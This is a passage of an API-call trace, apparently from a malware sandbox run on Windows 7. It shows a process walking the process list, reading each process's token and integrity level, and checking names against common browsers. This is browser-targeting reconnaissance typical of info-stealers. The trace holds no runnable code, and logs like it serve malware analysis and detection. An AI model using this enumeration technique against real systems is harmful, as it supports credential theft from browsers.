SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0226.871] CloseHandle (hObject=0x340) returned 1 [0226.871] CloseHandle (hObject=0x548) returned 1 [0226.871] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0226.871] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0226.871] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0226.871] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0226.871] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0226.871] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0226.871] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0226.872] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0228.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0xfcfadc | out: SystemInformation=0x0, ResultLength=0xfcfadc*=0xc0a0) returned 0xc0000004 [0228.875] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x340000 [0228.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x340000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x340000, ResultLength=0x0) returned 0x0 [0228.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0228.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0228.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0228.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0228.876] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.876] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.876] GetLastError () returned 0x7a [0228.876] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.876] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.876] CloseHandle (hObject=0x340) returned 1 [0228.876] CloseHandle (hObject=0x548) returned 1 [0228.876] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0x548 [0228.876] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x349720, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.876] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.876] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.876] GetLastError () returned 0x7a [0228.876] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.876] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.876] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.876] CloseHandle (hObject=0x340) returned 1 [0228.876] CloseHandle (hObject=0x548) returned 1 [0228.877] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0228.877] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0228.877] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0228.877] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0228.877] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0228.877] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0228.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0228.877] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.877] GetLastError () returned 0x7a [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.877] CloseHandle (hObject=0x340) returned 1 [0228.877] CloseHandle (hObject=0x548) returned 1 [0228.877] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x548 [0228.877] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x345d08, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.877] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.877] GetLastError () returned 0x7a [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.877] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.877] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.877] CloseHandle (hObject=0x340) returned 1 [0228.877] CloseHandle (hObject=0x548) returned 1 [0228.877] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0228.877] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0228.877] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0228.877] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0228.877] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0228.877] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0228.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0228.877] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.877] GetLastError () returned 0x7a [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.877] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.877] CloseHandle (hObject=0x340) returned 1 [0228.878] CloseHandle (hObject=0x548) returned 1 [0228.878] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x548 [0228.878] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x345ea0, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.878] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.878] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.878] GetLastError () returned 0x7a [0228.878] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.878] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.878] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.878] CloseHandle (hObject=0x340) returned 1 [0228.878] CloseHandle (hObject=0x548) returned 1 [0228.878] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0228.878] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0228.878] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0228.878] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0228.878] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0228.878] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0228.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0228.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0228.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0228.878] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.878] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.878] GetLastError () returned 0x7a [0228.878] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.878] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.878] CloseHandle (hObject=0x340) returned 1 [0228.878] CloseHandle (hObject=0x548) returned 1 [0228.878] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x548 [0228.878] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3464e8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.878] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.878] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.878] GetLastError () returned 0x7a [0228.878] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.878] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.878] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.878] CloseHandle (hObject=0x340) returned 1 [0228.879] CloseHandle (hObject=0x548) returned 1 [0228.879] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0228.879] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0228.879] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0228.879] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0228.879] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0228.879] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0228.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0228.879] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.879] GetLastError () returned 0x7a [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.879] CloseHandle (hObject=0x340) returned 1 [0228.879] CloseHandle (hObject=0x548) returned 1 [0228.879] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x548 [0228.879] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x3469e0, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.879] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.879] GetLastError () returned 0x7a [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.879] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.879] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.879] CloseHandle (hObject=0x340) returned 1 [0228.879] CloseHandle (hObject=0x548) returned 1 [0228.879] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0228.879] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0228.879] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0228.879] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0228.879] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0228.879] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0228.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0228.879] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.879] GetLastError () returned 0x7a [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.879] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.879] CloseHandle (hObject=0x340) returned 1 [0228.880] CloseHandle (hObject=0x548) returned 1 [0228.880] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x548 [0228.880] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346af8, dwBuildNumber=0x1f00736c, dwPlatformId=0xf4ffa8, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0228.880] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x340) returned 1 [0228.880] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0228.880] GetLastError () returned 0x7a [0228.880] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0228.880] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0228.880] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0228.880] CloseHandle (hObject=0x340) returned 1 [0228.880] CloseHandle (hObject=0x548) returned 1 [0228.880] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0228.880] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0228.880] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0228.880] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0228.880] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0228.880] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0228.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0228.880] OpenProcessToken (in: ProcessHandle=0x548, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x340) returned 1 [0228.880] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0228.880] GetLastError () returned 0x7a [0228.880] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0x1, TokenInformation=0xf4fe80, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xf4fe80, ReturnLength=0xfcfa8c) returned 1 [0228.880] GetTokenInformation (in: TokenHandle=0x340, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0228.880] CloseHandle (hObject=0x340) returned 1 [0228.880] CloseHandle (hObject=0x548) returned 1 [0228.880] GetLengthSid (pSid=0xf4fe88*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0228.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x548 [0228.880] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x346c10, dwBuildNumber=0x1f00736c, 